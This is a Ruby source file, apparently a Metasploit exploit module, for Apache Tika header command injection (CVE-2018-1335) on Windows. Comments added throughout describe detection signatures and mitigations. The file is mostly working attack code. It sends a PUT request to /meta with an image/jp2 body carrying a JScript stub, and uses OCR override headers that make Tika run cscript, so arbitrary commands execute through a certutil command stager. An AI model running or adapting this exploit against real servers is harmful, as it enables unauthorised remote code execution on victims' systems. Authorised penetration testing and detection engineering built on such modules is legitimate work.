Path: blob/master/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Apache Tika header command injection (CVE-2018-1335), Windows targets.
#
# Request shape this module sends, as visible in #execute_command, which is the
# useful thing for detection engineering:
#   * HTTP PUT to <TARGETURI>/meta
#   * Content-type: image/jp2 whose body is not an image (a short JScript text)
#   * X-Tika-OCRTesseractPath and X-Tika-OCRLanguage request headers present
# Ordinary Tika clients have no reason to send OCR override headers together
# with an image/jp2 body, so that combination is a high-signal WAF/IDS rule.
# Per the description only Tika 1.15 - 1.17 on Windows was confirmed
# exploitable; moving out of that range and keeping the tika-server /meta
# endpoint off untrusted networks are the mitigations the page supports.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): the Powershell mixin is included but nothing in this file
  # calls it; delivery goes through the certutil CmdStager flavor declared below.
  include Msf::Exploit::Powershell
  # AutoCheck is prepended so #check is consulted before #exploit runs
  # (framework behaviour of the mixin; confirm against its current source).
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and user options.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache Tika Header Command Injection',
      'Description' => %q{
        This module exploits a command injection vulnerability in Apache
        Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is
        used to bypass magic bytes checking. When OCR is specified in the
        request, parameters can be passed to change the parameters passed
        at command line to allow for arbitrary JScript to execute. A
        JScript stub is passed to execute arbitrary code. This module was
        verified against version 1.15 - 1.17 on Windows 2012.
        While the CVE and finding show more versions vulnerable, during
        testing it was determined only > 1.14 was exploitable due to
        jp2 support being added.
      },
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Windows',
            {'Arch' => [ARCH_X86, ARCH_X64],
             'Platform' => 'win',
             # certutil is the only stager flavor offered; the Windows
             # target gets no choice of delivery mechanism.
             'CmdStagerFlavor' => ['certutil']
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2018-04-25',
      'Author' =>
        [
          'h00die', # msf module
          'David Yesland', # edb submission
          'Tim Allison' # discovery
        ],
      'References' =>
        [
          ['EDB', '46540'],
          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
          ['CVE', '2018-1335']
        ]))

    # RPORT defaults to 9998 here; TARGETURI is the base path that #check and
    # #execute_command build their URIs from via normalize_uri.
    register_options(
      [
        Opt::RPORT(9998),
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
      ])
  end

  # Version-based vulnerability check.
  #
  # Requests the base URI (no 'method' given, so the HttpClient default is
  # used) and parses the Tika version banner out of the response body.
  # Returns CheckCode::Vulnerable only when the parsed version lies in the
  # inclusive range 1.15..1.17; no response, non-200 status, no banner, or a
  # version outside the range all return CheckCode::Safe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri),
    })
    if res.nil?
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    elsif res.code != 200
      # NOTE(review): this branch did receive a response; the message is a copy
      # of the nil branch and would read better as e.g. 'Unexpected HTTP status'.
      vprint_error('No server response, check configuration')
      return CheckCode::Safe
    end

    # NOTE(review): the '.' after \d is unescaped and matches any character,
    # not only the version separator; the intended pattern is presumably
    # /Apache Tika (\d\.\d+)/. Style-wise Regexp.last_match(1) is preferred
    # over $1 below.
    if res.body =~ /Apache Tika (\d.[\d]+)/
      version = Rex::Version.new($1)
      vprint_status("Apache Tika Version Detected: #{version}")
      # Inclusive range. Versions outside it fall through to Safe even though
      # the description notes the CVE lists more versions as affected.
      if version.between?(Rex::Version.new('1.15'), Rex::Version.new('1.17'))
        return CheckCode::Vulnerable
      end
    end
    CheckCode::Safe
  end

  # CmdStager callback: delivers one staged command line to the target.
  #
  # The command is wrapped in a two-line JScript stub and sent as the body of
  # a PUT to <TARGETURI>/meta carrying the OCR override headers the
  # description identifies as the injection vector. The HTTP reply is only
  # sanity-checked (status 200 and a body containing 'tika'); the staged
  # command's own outcome is not observable from the response.
  #
  # @param cmd [String] command line produced by the CmdStager
  # @param opts [Hash] presumably required by the CmdStager callback
  #   signature; not read here
  # @raise fails the module via fail_with on no response
  #   (Failure::Disconnected) or an unexpected reply (Failure::UnexpectedReply)
  def execute_command(cmd, opts = {})
    cmd.gsub(/"/, '\"')
    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"

    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri, 'meta'),
      # The two X-Tika-OCR* headers plus an image/jp2 content type on a PUT
      # are the indicators a defender can alert on; legitimate clients do not
      # combine them.
      'headers' => {
        "X-Tika-OCRTesseractPath" => '"cscript"',
        "X-Tika-OCRLanguage" => "//E:Jscript",
        "Expect" => "100-continue",
        "Content-type" => "image/jp2",
        "Connection" => "close"},
      'data' => jscript
    })

    fail_with(Failure::Disconnected, 'No server response') unless res
    # Loose success heuristic: any 200 whose body mentions 'tika' is accepted.
    unless (res.code == 200 && res.body.include?('tika'))
      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
    end
  end

  # Entry point: hands control to the CmdStager, which calls #execute_command
  # once per staged chunk. linemax presumably caps each chunk's command-line
  # length (framework option; confirm against the CmdStager mixin).
  def exploit
    execute_cmdstager(linemax: 8000)
  end
end